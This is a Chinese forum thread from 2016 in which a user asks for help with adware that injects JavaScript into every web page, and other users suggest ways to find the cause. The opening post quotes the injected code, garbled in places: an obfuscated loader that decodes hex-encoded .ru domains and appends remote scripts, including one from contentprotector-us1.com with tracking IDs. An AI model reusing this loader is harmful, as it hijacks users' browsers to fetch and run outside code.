V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
sky395
V2EX  ›  信息安全

360 是在吃 SHI 吗?!!

  •  
  •   sky395 · 2016-05-25 04:59:03 +08:00 · 4915 次点击
    这是一个创建于 3138 天前的主题,其中的信息可能已经有所发展或是发生改变。

    电脑中招了, 不管是 chrome 还是 firefox 还是 ie 打开所有的网页在<head>里都有一下代码: """ <html><head><script>!function(){var t=JSON.parse('["31747867353936342e7275","7877793673796d746d79637a772e7275"]'),e="26201",o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",o=0;o<t.length;o++)e+=string.fromcharcode(parseint(t[o],16));return e},n="function(t,e,o){var" n="document.location.protocol+" "+t;if(window.smlo&amp;&amp;-1="=navigator.userAgent.toLowerCase().indexOf(" firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else""="" if(window.zsmlo&&-1="=navigator.userAgent.toLowerCase().indexOf(" firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var"="" r="document.createElement(" script");r.setAttribute("src",n),r.setAttribute("type","text="" javascript"),document.head.appendChild(r),r.onload="function(){this.a982392846||(this.a982392846=!0," function"="=typeof""" e&&e())},r.onerror="function(){this.a982392846||(this.a982392846=!0,r.parentNode.removeChild(r)," function"="=typeof" "="" o&&o())}}},r="function(i){var" a="i?i:t[0],s=o(a)+" pjs="" "+e+".js";n(s,function(){},function(){var"="" e="t.indexOf(a),o=t[e+1];o&amp;&amp;r(o)})};r()}();function" getcfcookie(name)="" {="" var="" matches="document.cookie.match(new" regexp("(?:^|;="" )"="" +="" name.replace(="" ([\.$?*|{}\(\)\[\]\\\="" \+^])="" g,="" '\\$1')="" +="" "="([^;]*)" ));"="" return="" matches="" ?="" decodeuricomponent(matches[1])="" :="" undefined;}="" if="" (window.self="=" window.top)="" {="" document.addeventlistener("domcontentloaded",="" function(){="" var="" pops="document.createElement('script');" var="" cfiltercookie="6697e3d5eb75761c638fdeb1eed84055" ;="" var="" cfiltercookieisset="getCfCookie(cfilterCookie)" ?="" getcfcookie(cfiltercookie)="" :="" 0;="" pops.src="//&lt;a href=" http:="" <a="" href="http://contentprotector-us1.com" rel="nofollow">contentprotector-us1.com="" "="" rel="nofollow">contentprotector-us1.com/" +="" 'getcl="" rotator="" '="" +="" 'campaignid="" 1="" '="" +="" 'sourceid="" 109="" '="" +="" 'siteid="" 13138="" '="" +="" 'userid="" 07b57414-d0f4-4fd0-8e24-8ebc6e177c5a="" '="" +="" 'iscookie="" '="" +="" cfiltercookieisset;="" document.head.appendchild(pops);="" });}<="" script=""> <meta http-equiv="content-type" content="text/html;charset=utf-8">

    404 Not Found </head> <body text="#000000" bgcolor="#ffffff">

    Error: Not Found

    The requested URL / was not found on this server.

    </body></html> """ 导致打开所有网页都巨慢!! 手动检查开机启动项和浏览器插件没发现问题。

    于是安装了大名鼎鼎的 360 全家桶。查了一晚上木马和病毒,结果报告说“电脑很安全”!! 我 xxxxx 。请问数字你在吃 SHI 吗? 还把我的电脑弄的更慢了! 现在发个帖子都卡的不行!现在感觉真是上贼船了!

    小弟不想重装系统,求各位大神有什么高招吗? 谢过先

    19 条回复    2016-05-25 10:02:11 +08:00
    casparchen
        1
    casparchen  
       2016-05-25 05:12:39 +08:00   ❤️ 10
    虽然很讨厌数字, 但是这个黑我给 0 分
    cxbig
        2
    cxbig  
       2016-05-25 05:17:55 +08:00
    浏览器装的插件一个个关掉,看看是哪个插件插入的
    sky395
        3
    sky395  
    OP
       2016-05-25 05:23:49 +08:00
    @cxbig 所有插件都关了,还是被植入代码, 应该和插件没关系, 因为所有的游览器( chrome , firefox 和 ie )都有这个问题。 感觉像中木马了
    binux
        4
    binux  
       2016-05-25 05:31:38 +08:00
    命令行拉个页面看看
    cxbig
        5
    cxbig  
       2016-05-25 05:32:10 +08:00
    @sky395 确定不是插件,就进行第二步:随便打开几个 https 页面看看有没有这代码。这个可以简单确认不是静态内容被宽带供应商劫持。
    sky395
        6
    sky395  
    OP
       2016-05-25 05:34:32 +08:00
    @binux 命令行怎么搞? 求指教
    sky395
        7
    sky395  
    OP
       2016-05-25 05:37:30 +08:00
    @cxbig https 页面没有被插入代码。 肯定不是供应商劫持, 同台电脑其它系统没这问题。
    binux
        8
    binux  
       2016-05-25 05:39:52 +08:00
    @sky395
    `curl http://httpbin.org/html`

    https 没有被插入代码,才更有可能是供应商劫持。。如果是插件, https 一样能插。。
    sky395
        9
    sky395  
    OP
       2016-05-25 05:44:30 +08:00
    @binux 我这是 win10 系统,没有 curl 命令呀。 应该不是供应商劫持, 同台电脑其它的 win10 系统没有这个问题。 这段代码的表现就是把所有页面里的关键字都变成广告链接。
    sky395
        10
    sky395  
    OP
       2016-05-25 05:45:52 +08:00
    很奇怪, 360 浏览器没有被劫持?
    sky395
        11
    sky395  
    OP
       2016-05-25 05:51:58 +08:00
    感觉应该是系统木马的劫持,可能是 360 浏览器不出名,导致没有被照顾到?
    ThreeBody
        12
    ThreeBody  
       2016-05-25 06:10:25 +08:00 via Android
    还有可能是 winsocks 劫持,做一个系统还原点,然后使用
    netsh winsock reset
    重启后看看
    hx1997
        13
    hx1997  
       2016-05-25 07:04:58 +08:00 via Android
    看看代理服务器?
    anyclue
        14
    anyclue  
       2016-05-25 09:39:28 +08:00
    别用杀毒,用系统查杀里面的常规修复试试,系统急救箱呢?
    cfans1993
        15
    cfans1993  
       2016-05-25 09:43:30 +08:00 via Android
    楼主是不是安装了破解版游戏或激动工具
    cfans1993
        16
    cfans1993  
       2016-05-25 09:44:00 +08:00 via Android
    激活
    rogeecn
        17
    rogeecn  
       2016-05-25 09:53:55 +08:00
    问题都没定位到,就把 360 来黑~
    zuoxiaomo
        18
    zuoxiaomo  
       2016-05-25 09:58:26 +08:00
    这个和 360 有毛线关系。。。
    dxfree
        19
    dxfree  
       2016-05-25 10:02:11 +08:00
    电脑中招了去装 360 解决,也是够没水平的。。。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2735 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 12:31 · PVG 20:31 · LAX 04:31 · JFK 07:31
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.